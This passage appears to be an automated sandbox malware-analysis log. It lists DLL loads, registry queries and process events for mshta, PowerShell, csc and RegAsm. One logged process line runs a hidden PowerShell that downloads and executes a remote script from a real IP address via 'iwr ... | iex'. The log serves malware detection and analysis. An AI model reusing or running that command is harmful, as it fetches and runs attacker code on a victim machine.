Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Binary string: Automation.pdb source: powershell.exe, 00000001.00000002.1793256406.00000000084AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.pdbx source: powershell.exe, 00000001.00000002.1781632412.0000000005BFD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1779801283.0000000003128000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.pdb source: powershell.exe, 00000001.00000002.1781632412.0000000005651000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Managem..Automation.pdb source: powershell.exe, 00000001.00000002.1793256406.00000000084AC000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00446061 push edx; retf 7_2_00446062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh 7_2_0043CA63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00445A2E push esi; ret 7_2_00445A31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00442543 push esp; retf 7_2_00442549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00439F70 push eax; mov dword ptr [esp], 60616263h 7_2_00439F7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
